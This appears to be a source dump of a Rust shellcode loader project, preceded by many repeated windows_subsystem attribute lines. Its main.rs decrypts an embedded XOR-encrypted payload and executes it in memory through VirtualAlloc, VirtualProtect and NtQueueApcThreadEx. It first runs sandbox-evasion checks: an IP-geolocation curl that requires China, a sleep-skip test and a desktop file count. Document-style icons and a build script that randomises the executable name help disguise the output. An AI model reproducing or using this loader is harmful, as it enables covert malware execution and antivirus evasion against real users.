323 | #![windows_subsystem = "windows"]
324 | #![windows_subsystem = "windows"]
325 | #![windows_subsystem = "windows"]
326 | #![windows_subsystem = "windows"]
327 | #![windows_subsystem = "windows"]
328 | #![windows_subsystem = "windows"]
329 | #![windows_subsystem = "windows"]
330 | #![windows_subsystem = "windows"]
331 | #![windows_subsystem = "windows"]
332 | #![windows_subsystem = "windows"]
333 | #![windows_subsystem = "windows"]
334 | #![windows_subsystem = "windows"]
335 | #![windows_subsystem = "windows"]
336 | #![windows_subsystem = "windows"]
337 | #![windows_subsystem = "windows"]
338 | #![windows_subsystem = "windows"]
339 | #![windows_subsystem = "windows"]
340 | #![windows_subsystem = "windows"]
341 | #![windows_subsystem = "windows"]
342 | #![windows_subsystem = "windows"]
343 | #![windows_subsystem = "windows"]
344 | #![windows_subsystem = "windows"]
345 | #![windows_subsystem = "windows"]
346 | #![windows_subsystem = "windows"]
347 | #![windows_subsystem = "windows"]
348 | #![windows_subsystem = "windows"]
349 | #![windows_subsystem = "windows"]
350 | #![windows_subsystem = "windows"]
351 | #![windows_subsystem = "windows"]
352 | #![windows_subsystem = "windows"]
353 | #![windows_subsystem = "windows"]
354 | #![windows_subsystem = "windows"]
355 | #![windows_subsystem = "windows"]
356 | #![windows_subsystem = "windows"]
357 | #![windows_subsystem = "windows"]
358 | #![windows_subsystem = "windows"]
359 | #![windows_subsystem = "windows"]
360 | #![windows_subsystem = "windows"]
361 | #![windows_subsystem = "windows"]
362 | #![windows_subsystem = "windows"]
363 | #![windows_subsystem = "windows"]
364 | #![windows_subsystem = "windows"]
365 | #![windows_subsystem = "windows"]
366 | #![windows_subsystem = "windows"]
367 | #![windows_subsystem = "windows"]
368 | #![windows_subsystem = "windows"]
369 | #![windows_subsystem = "windows"]
370 | #![windows_subsystem = "windows"]
371 | #![windows_subsystem = "windows"]
372 | #![windows_subsystem = "windows"]
373 | #![windows_subsystem = "windows"]
374 | #![windows_subsystem = "windows"]
375 | #![windows_subsystem = "windows"]
376 | #![windows_subsystem = "windows"]
377 | #![windows_subsystem = "windows"]
378 | #![windows_subsystem = "windows"]
379 | #![windows_subsystem = "windows"]
380 | #![windows_subsystem = "windows"]
381 | #![windows_subsystem = "windows"]
382 | #![windows_subsystem = "windows"]
383 | #![windows_subsystem = "windows"]
384 | #![windows_subsystem = "windows"]
385 | #![windows_subsystem = "windows"]
386 | #![windows_subsystem = "windows"]
387 | #![windows_subsystem = "windows"]
388 | #![windows_subsystem = "windows"]
389 | #![windows_subsystem = "windows"]
390 | #![windows_subsystem = "windows"]
391 | #![windows_subsystem = "windows"]
392 | #![windows_subsystem = "windows"]
393 | #![windows_subsystem = "windows"]
394 | #![windows_subsystem = "windows"]
395 | #![windows_subsystem = "windows"]
396 | #![windows_subsystem = "windows"]
397 | #![windows_subsystem = "windows"]
398 | #![windows_subsystem = "windows"]
399 | #![windows_subsystem = "windows"]
400 | #![windows_subsystem = "windows"]
401 | #![windows_subsystem = "windows"]
402 | #![windows_subsystem = "windows"]
403 | #![windows_subsystem = "windows"]
404 | #![windows_subsystem = "windows"]
405 | #![windows_subsystem = "windows"]
406 | #![windows_subsystem = "windows"]
407 | #![windows_subsystem = "windows"]
408 | #![windows_subsystem = "windows"]
409 | #![windows_subsystem = "windows"]
410 | #![windows_subsystem = "windows"]
411 | #![windows_subsystem = "windows"]
412 | #![windows_subsystem = "windows"]
413 | #![windows_subsystem = "windows"]
414 | #![windows_subsystem = "windows"]
415 | #![windows_subsystem = "windows"]
416 | #![windows_subsystem = "windows"]
417 | #![windows_subsystem = "windows"]
418 | #![windows_subsystem = "windows"]
419 | #![windows_subsystem = "windows"]
420 | #![windows_subsystem = "windows"]
421 | #![windows_subsystem = "windows"]
422 | #![windows_subsystem = "windows"]
423 | #![windows_subsystem = "windows"]
424 | #![windows_subsystem = "windows"]
425 | #![windows_subsystem = "windows"]
426 | #![windows_subsystem = "windows"]
427 | #![windows_subsystem = "windows"]
428 | #![windows_subsystem = "windows"]
429 | #![windows_subsystem = "windows"]
430 | #![windows_subsystem = "windows"]
431 | #![windows_subsystem = "windows"]
432 | #![windows_subsystem = "windows"]
433 | #![windows_subsystem = "windows"]
434 | #![windows_subsystem = "windows"]
435 | #![windows_subsystem = "windows"]
436 | #![windows_subsystem = "windows"]
437 | #![windows_subsystem = "windows"]
438 | #![windows_subsystem = "windows"]
439 | #![windows_subsystem = "windows"]
440 | #![windows_subsystem = "windows"]
441 | #![windows_subsystem = "windows"]
442 | #![windows_subsystem = "windows"]
443 | #![windows_subsystem = "windows"]
444 | #![windows_subsystem = "windows"]
445 | #![windows_subsystem = "windows"]
446 | #![windows_subsystem = "windows"]
447 | #![windows_subsystem = "windows"]
448 | #![windows_subsystem = "windows"]
449 | #![windows_subsystem = "windows"]
450 | #![windows_subsystem = "windows"]
451 | #![windows_subsystem = "windows"]
452 | #![windows_subsystem = "windows"]
453 | #![windows_subsystem = "windows"]
454 | #![windows_subsystem = "windows"]
455 | #![windows_subsystem = "windows"]
456 | #![windows_subsystem = "windows"]
457 | #![windows_subsystem = "windows"]
458 | #![windows_subsystem = "windows"]
459 | #![windows_subsystem = "windows"]
460 | #![windows_subsystem = "windows"]
461 | #![windows_subsystem = "windows"]
462 | #![windows_subsystem = "windows"]
463 | #![windows_subsystem = "windows"]
464 | #![windows_subsystem = "windows"]
465 | #![windows_subsystem = "windows"]
466 | #![windows_subsystem = "windows"]
467 | #![windows_subsystem = "windows"]
468 | #![windows_subsystem = "windows"]
469 | #![windows_subsystem = "windows"]
470 | #![windows_subsystem = "windows"]
471 | #![windows_subsystem = "windows"]
472 | #![windows_subsystem = "windows"]
473 | #![windows_subsystem = "windows"]
474 | #![windows_subsystem = "windows"]
475 | #![windows_subsystem = "windows"]
476 | #![windows_subsystem = "windows"]
477 | #![windows_subsystem = "windows"]
478 | #![windows_subsystem = "windows"]
479 | #![windows_subsystem = "windows"]
480 | #![windows_subsystem = "windows"]
481 | #![windows_subsystem = "windows"]
482 | #![windows_subsystem = "windows"]
483 | #![windows_subsystem = "windows"]
484 | #![windows_subsystem = "windows"]
485 | #![windows_subsystem = "windows"]
486 | #![windows_subsystem = "windows"]
487 | #![windows_subsystem = "windows"]
488 | #![windows_subsystem = "windows"]
489 | #![windows_subsystem = "windows"]
490 | #![windows_subsystem = "windows"]
491 | #![windows_subsystem = "windows"]
492 | #![windows_subsystem = "windows"]
493 | #![windows_subsystem = "windows"]
494 | #![windows_subsystem = "windows"]
495 | #![windows_subsystem = "windows"]
496 | #![windows_subsystem = "windows"]
497 | #![windows_subsystem = "windows"]
498 | #![windows_subsystem = "windows"]
499 | #![windows_subsystem = "windows"]
500 | #![windows_subsystem = "windows"]
501 | 


--------------------------------------------------------------------------------
/src/main.rs:
--------------------------------------------------------------------------------
  1 | #![windows_subsystem = "windows"]
  2 | mod forgery;
  3 | use std::str;
  4 | use std::process::{exit, Command};
  5 | use std::ffi::c_void;
  6 | use std::mem::transmute;
  7 | use std::ptr::{copy, null};
  8 | use windows_sys::Win32::Foundation::{GetLastError, FALSE, HANDLE};
  9 | use windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};
 10 | use windows_sys::Win32::System::Memory::{
 11 |     VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
 12 | };
 13 | use windows_sys::Win32::System::Threading::GetCurrentThread;
 14 | use std::os::windows::process::CommandExt;
 15 | use winapi::um::winbase::CREATE_NO_WINDOW;
 16 | 
 17 | use std::fs;
 18 | use std::path::PathBuf;
 19 | use std::process;
 20 | 
 21 | 
 22 | 
 23 | 
 24 | fn decrypt_with_uuid(data: &[u8], uuid: &uuid::Uuid) -> Vec<u8> {
 25 |     let uuid_bytes = uuid.as_bytes();
 26 |     let uuid_len = uuid_bytes.len();
 27 |     let mut decrypted_data = Vec::new();
 28 |     for (i, byte) in data.iter().enumerate() {
 29 |         decrypted_data.push(byte ^ uuid_bytes[i % uuid_len]);
 30 |     }
 31 |     decrypted_data
 32 | }
 33 | 
 34 | pub fn ft() {
 35 |     use std::time::{Duration, Instant};
 36 |     use std::thread::sleep;
 37 | 
 38 |     let start_time = Instant::now();
 39 | 
 40 |     sleep(Duration::from_millis(5000));
 41 | 
 42 |     let elapsed_time = start_time.elapsed();
 43 | 
 44 |     if elapsed_time.as_millis() < 5000 {
 45 |         std::process::exit(1);
 46 |     }
 47 | }
 48 | 
 49 | 
 50 | fn ip() {
 51 |     let output = Command::new("cmd")
 52 |         .args(&["/c", "curl -s https://myip.ipip.net/"])
 53 |         .creation_flags(CREATE_NO_WINDOW)
 54 |         .output()
 55 |         .expect("Failed to execute command");
 56 | 
 57 |     if !output.status.success() {
 58 |         std::process::exit(1);
 59 |     }
 60 | 
 61 |     let body = str::from_utf8(&output.stdout).expect("Failed to parse response");
 62 | 
 63 |     if body.contains("中国") {
 64 |     } else {
 65 |         std::process::exit(1);
 66 |     }
 67 | }
 68 | 
 69 | fn cdp() {
 70 |     if !check_desktop_files() {
 71 |         process::exit(1);
 72 |     }
 73 | }
 74 | 
 75 | fn check_desktop_files() -> bool {
 76 |     // 获取桌面路径
 77 |     let desktop_path = match get_desktop_path() {
 78 |         Some(path) => path,
 79 |         None => return false,
 80 |     };
 81 | 
 82 |     let entries = match fs::read_dir(&desktop_path) {
 83 |         Ok(entries) => entries,
 84 |         Err(_) => return false,
 85 |     };
 86 | 
 87 |     let file_count = entries.filter_map(|entry| entry.ok()).count();
 88 | 
 89 |     // 检查文件数量是否小于 6
 90 |     file_count >= 6
 91 | }
 92 | 
 93 | fn get_desktop_path() -> Option<PathBuf> {
 94 |     let home_dir = dirs::home_dir()?;
 95 |     Some(home_dir.join("Desktop"))
 96 | }
 97 | 
 98 | 
 99 | fn main() {
100 |     ip();
101 |     ft();
102 |     cdp();
103 |     //forgery::bundle::bundlefile();
104 |     let encrypted_data = include_bytes!("encrypt.bin");
105 |     let uuid_bytes = include_bytes!("uuidkey.txt");
106 |     let uuid_str = str::from_utf8(uuid_bytes).expect("Failed to read UUID string");
107 |     let uuid = uuid::Uuid::parse_str(uuid_str.trim()).expect("Invalid UUID string");
108 |     let decrypted_data = decrypt_with_uuid(encrypted_data, &uuid);
109 | 
110 | 
111 |     unsafe {
112 |         let shellcode = std::slice::from_raw_parts(decrypted_data.as_ptr(), decrypted_data.len());
113 |         let shellcode_size = shellcode.len();
114 |         let ntdll = LoadLibraryA(b"ntdll.dll\0".as_ptr());
115 |         if ntdll == 0 {
116 |             panic!("[-]LoadLibraryA failed: {}!", GetLastError());
117 |         }
118 | 
119 |         let fn_nt_queue_apc_thread_ex = GetProcAddress(ntdll, b"NtQueueApcThreadEx\0".as_ptr());
120 | 
121 |         let nt_queue_apc_thread_ex: extern "C" fn(HANDLE, isize, *mut c_void, isize, isize, isize) =
122 |             transmute(fn_nt_queue_apc_thread_ex);
123 | 
124 |         let addr = VirtualAlloc(
125 |             null(),
126 |             shellcode_size,
127 |             MEM_COMMIT | MEM_RESERVE,
128 |             PAGE_READWRITE,
129 |         );
130 |         if addr.is_null() {
131 |             panic!("[-]VirtualAlloc failed: {}!", GetLastError());
132 |         }
133 | 
134 |         copy(shellcode.as_ptr(), addr.cast(), shellcode_size);
135 | 
136 |         let mut old = PAGE_READWRITE;
137 |         let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);
138 |         if res == FALSE {
139 |             panic!("[-]VirtualProtect failed: {}!", GetLastError());
140 |         }
141 | 
142 |         let handle = GetCurrentThread();
143 |         if handle == 0 {
144 |             panic!("[-]OpenProcess failed: {}!", GetLastError());
145 |         }
146 | 
147 |         nt_queue_apc_thread_ex(handle, 1, addr, 0, 0, 0);
148 |     }
149 | }
150 | 


--------------------------------------------------------------------------------
/static/avp_0000.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/static/avp_0000.ico


--------------------------------------------------------------------------------
/static/excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/static/excel.ico


--------------------------------------------------------------------------------
/static/notepad.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/static/notepad.ico


--------------------------------------------------------------------------------
/static/pdf.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/static/pdf.ico


--------------------------------------------------------------------------------
/static/word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/static/word.ico


--------------------------------------------------------------------------------
/一键生成.bat:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | setlocal EnableDelayedExpansion
 3 | 
 4 | python encrypt.py
 5 | 
 6 | cargo build --release
 7 | 
 8 | set "sourceFile=target\release\project.exe"
 9 | set "targetDir=output"
10 | 
11 | set "chars=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
12 | set "randomName="
13 | 
14 | for /l %%i in (1,1,6) do (
15 |     set /a "randIndex=!random! %% 52"
16 |     for %%j in (!randIndex!) do set "randomName=!randomName!!chars:~%%j,1!"
17 | )
18 | 
19 | set "targetFile=%targetDir%\!randomName!.exe"
20 | 
21 | copy "%sourceFile%" "%targetFile%"
22 | 
23 | echo Copied and renamed to: "%targetFile%"
24 | 
25 | endlocal
26 | 


--------------------------------------------------------------------------------